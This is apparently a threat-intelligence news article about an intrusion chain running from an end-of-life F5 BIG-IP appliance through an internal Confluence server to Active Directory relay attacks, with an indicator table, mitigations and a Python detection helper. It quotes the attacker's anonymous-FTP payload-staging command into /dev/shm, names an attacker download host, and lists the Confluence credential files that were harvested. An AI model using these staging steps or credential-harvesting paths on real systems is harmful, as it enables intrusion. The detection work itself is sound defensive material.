Threat actors are actively exploiting end-of-life F5 BIG-IP appliances to gain unauthorized SSH access into enterprise networks, using the compromised devices as launchpads for sophisticated multi-stage intrusion campaigns that ultimately target Active Directory infrastructure.
Microsoft Threat Intelligence disclosed the full attack chain on May 22, 2026, documenting how a single compromised edge appliance cascaded into domain-level compromise spanning Linux hosts, an internal Atlassian Confluence server, and Windows authentication systems.
In the documented incident, investigators traced the threat actor's initial SSH access to an Azure-hosted F5 BIG-IP Virtual Edition (VE) running version 15.1.201000, a cloud-deployed build commonly provisioned via Azure ARM templates and Terraform modules.
This specific version reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of compromise.
F5 BIG-IP to Gain SSH Access
The timing aligns directly with the broader F5 threat landscape. In August 2025, a sophisticated nation-state threat actor breached F5's internal systems and exfiltrated BIG-IP product source code along with details of undisclosed, unpatched vulnerabilities.
That breach, publicly disclosed by F5 in October 2025, has been linked to the BRICKSTORM malware family, which is associated with campaigns targeting software and cloud vendors to harvest source code and credentials for downstream supply chain exploitation.
Compounding the risk, CVE-2025-53521, a critical flaw in F5 BIG-IP Access Policy Manager (APM), was initially disclosed in October 2025 as a denial-of-service bug. However, it was reclassified in March 2026 as a remote code execution (RCE) vulnerability with a CVSS score of 9.8.
CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with the Shadowserver Foundation reporting over 17,000 vulnerable IPs worldwide at the time. The Dutch National Cyber Security Centre also independently confirmed active abuse of this vulnerability in the wild.
Once SSH access was established via the compromised F5 appliance, the threat actor authenticated using a privileged account with unrestricted sudo rights and maintained hands-on-keyboard access throughout the entire intrusion without deploying explicit persistence mechanisms.
The attacker immediately launched aggressive reconnaissance using a layered toolkit:
- Nmap with automated shell scripts for horizontal and vertical network scanning across internal subnets
- GoWitness to screenshot-capture all discovered HTTP/HTTPS services
- testssl to probe SSL/TLS weaknesses and identify potential protocol downgrade paths
- A custom ELF binary detected as HackTool:Linux/MalPack.B, downloaded from 206.189.27[.]39:8888 via wget, to enumerate web application access controls
Attempts to use standard NTLM-based lateral movement tools, including enum4linux, kerbrute, responder, smbclient, and netexec, against the Windows infrastructure were initially unsuccessful.
During reconnaissance, the threat actor identified an internally hosted Atlassian Confluence server carrying unpatched remote code execution vulnerabilities.
Microsoft noted that the server was not internet-facing; it became reachable only after the attacker gained internal network access, a key risk in hybrid and cloud environments where implicit trust boundaries exist between services.
When real-time protection (RTP) on the Confluence host blocked direct payload delivery, the threat actor adapted by standing up a Python FTP server on the initial Linux host to stage and transfer the payload using anonymous FTP:
```bash
curl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5
```
After compromising Confluence, the attacker extracted credentials from /opt/atlassian/confluence/conf/server.xml and confluence.cfg.xml and weaponized them for Kerberos relay attacks against the domain infrastructure.
This included exploitation of CVE-2025-33073, a Windows SMB NTLM reflection vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv.
CVE-2025-33073 removes the prerequisite of admin access to achieve authenticated RCE as SYSTEM on any domain-joined machine without SMB signing enforced, requiring only network access and any valid domain credential.
| Indicator | Type | Description |
|---|---|---|
| 4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 | SHA-256 File Hash | Custom scanning tool (HackTool:Linux/MalPack.B) |
| b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 | SHA-256 File Hash | Shell script automating Nmap network scanning |
| 710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | SHA-256 File Hash | Kerbrute tool (HackTool:Linux/Kerbrute!rfn) |
| 57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 | SHA-256 File Hash | gowitness HTTP/HTTPS screenshot scanner |
| bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 | SHA-256 File Hash | NTLM relay Python script (CVE-2025-33073 exploit) |
| 206.189.27[.]39 | IPv4 Address (Defanged) | C2 server payload delivery on port 8888 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
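As an added example (not code from the article or from Microsoft), the following Python helper refangs the published indicators only at comparison time, matches them against constructed endpoint and network telemetry, and also flags the anonymous-FTP-into-/dev/shm staging pattern described above. Host names, file paths and the 10.0.0.5 staging address are placeholders chosen for the sample; the hashes and the defanged IP are the ones in the table.

```python
# Indicators from the article's IoC table, kept defanged as published; the IP
# is refanged only at comparison time so the stored value never resolves.
C2_IP_DEFANGED = "206.189.27[.]39"
C2_PORT = 8888
KNOWN_SHA256 = {
    "4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465",  # HackTool:Linux/MalPack.B
    "bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455",  # NTLM relay script
}


def refang(indicator: str) -> str:
    """Undo common defanging ([.] and hxxp) so an indicator can be compared with telemetry."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def is_anon_ftp_staging(cmdline: str) -> bool:
    """Anonymous FTP fetch written into memory-backed /dev/shm, the staging pattern above."""
    return "ftp://anonymous:" in cmdline and "/dev/shm/" in cmdline


def check_event(event: dict) -> list[str]:
    """Return the names of every rule an event matches (empty list means no finding)."""
    hits = []
    if event.get("sha256", "").lower() in KNOWN_SHA256:
        hits.append("known_malicious_hash")
    if event.get("dst_ip") == refang(C2_IP_DEFANGED) and event.get("dst_port") == C2_PORT:
        hits.append("c2_payload_download")
    if is_anon_ftp_staging(event.get("cmdline", "")):
        hits.append("anon_ftp_staging_to_shm")
    return hits


def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Pair each event that fired at least one rule with its host name."""
    return [(e["host"], check_event(e)) for e in events if check_event(e)]


# Constructed sample telemetry for this example; host names, file paths and the
# 10.0.0.5 staging address are placeholders, not values from the incident.
SAMPLE_EVENTS = [
    {"host": "bigip-ve-01", "sha256": "4A927D031919FD6BD88D3C8A917214B54BCA00F8DDC80ECFE4D230663DDA7465"},
    {"host": "bigip-ve-01", "dst_ip": "206.189.27.39", "dst_port": 8888},
    {"host": "confluence-01", "cmdline": "curl -o /dev/shm/ag ftp://anonymous:anonymous@10.0.0.5/5"},
    {"host": "confluence-01", "cmdline": "curl -o /opt/app/update.tgz https://updates.example.internal/app.tgz"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Hash comparison is case-insensitive because EDR products differ in how they print SHA-256 values, and the benign curl to /opt shows the staging rule needs both the anonymous FTP scheme and the /dev/shm target to fire.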
Mitigation
- Retire EOL appliances immediately; treat internet-facing edge devices as Tier-0 assets with strict lifecycle governance
- Patch internal applications like Confluence with the same urgency as internet-exposed services.
- Disable or minimize NTLM, enforce SMB signing, and enable LDAP signing and channel binding to block relay attacks
- Enable Microsoft Defender for Endpoint in block mode consistently across all Linux servers.
- Implement a tiered administration model to prevent single-application credential theft from reaching domain controllers